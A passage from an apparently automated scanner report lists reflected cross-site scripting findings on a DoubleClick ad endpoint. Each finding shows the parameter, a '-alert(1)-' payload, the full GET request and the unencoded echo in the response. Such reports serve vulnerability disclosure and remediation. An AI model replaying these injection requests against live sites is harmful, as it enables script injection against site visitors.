Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4873

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
dlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=b9c36"-alert(1)-"b25cda93eb9&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/http://content.dove.us/mencare/Products.aspx?utm_source=CBSSPORTS&utm_medium
...[SNIP]...

3.7. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [event parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26e3d"-alert(1)-"11d37b6a276 was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=26e3d"-alert(1)-"11d37b6a276 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4872
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 23:22:40 GMT
Expires: Wed, 27 Apr 2011 23:22:40 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=26e3d"-alert(1)-"11d37b6a276http://content.dove.us/mencare/Products.aspx?utm_source=CBSSPORTS&utm_medium=traditional&utm_campaign=DMC_Deo_Product_Media_2011");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
...[SNIP]...

3.8. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 524b6"-alert(1)-"8ae5f73bf70 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn524b6"-alert(1)-"8ae5f73bf70&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4872

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
/%2a/j%3B236574810%3B0-0%3B0%3B60245620%3B4307-300/250%3B41415177/41432964/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn524b6"-alert(1)-"8ae5f73bf70&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214
...[SNIP]...

3.9. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f578"-alert(1)-"41bdc1636cb was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US8f578"-alert(1)-"41bdc1636cb&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4877

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
0%3B1-0%3B0%3B60245620%3B4307-300/250%3B41437920/41455707/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US8f578"-alert(1)-"41bdc1636cb&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0G
...[SNIP]...

3.10. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [nd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45614"-alert(1)-"a1b1ccad763 was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=2240845614"-alert(1)-"a1b1ccad763&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4872

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
307-300/250%3B41415177/41432964/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=2240845614"-alert(1)-"a1b1ccad763&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23
...[SNIP]...

3.11. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [o parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 651ea"-alert(1)-"2bbb3a752bd was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a651ea"-alert(1)-"2bbb3a752bd&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4872

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
7/16a/%2a/j%3B236574810%3B0-0%3B0%3B60245620%3B4307-300/250%3B41415177/41432964/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a651ea"-alert(1)-"2bbb3a752bd&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.19
...[SNIP]...

3.12. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [oepartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b433b"-alert(1)-"a8247191af was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=b433b"-alert(1)-"a8247191af&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4871

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=b433b"-alert(1)-"a8247191af&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/http://content.dove.us/mencare/Products.aspx?utm_source=CBSSPORTS&
...[SNIP]...

3.13. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [orh parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67e78"-alert(1)-"f7448d9e721 was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com67e78"-alert(1)-"f7448d9e721&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4878

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com67e78"-alert(1)-"f7448d9e721&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/http://content.dove.us/mencare/Products.aspx?utm_source
...[SNIP]...

3.14. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97493"-alert(1)-"ee5fa11b092 was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=297493"-alert(1)-"ee5fa11b092&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4877

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
/o%3B236574810%3B1-0%3B0%3B60245620%3B4307-300/250%3B41437920/41455707/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=297493"-alert(1)-"ee5fa11b092&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243
...[SNIP]...

3.15. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [pdom parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12978"-alert(1)-"e22432d472d was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com12978"-alert(1)-"e22432d472d&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4873

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
07108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com12978"-alert(1)-"e22432d472d&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/http://content.dove.us/mencare/Products.aspx?utm_source=CBSSPORTS&utm_medium=traditional&utm_campaign=DMC_Deo
...[SNIP]...

3.16. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [pg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65cd9"-alert(1)-"c00625812dd was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

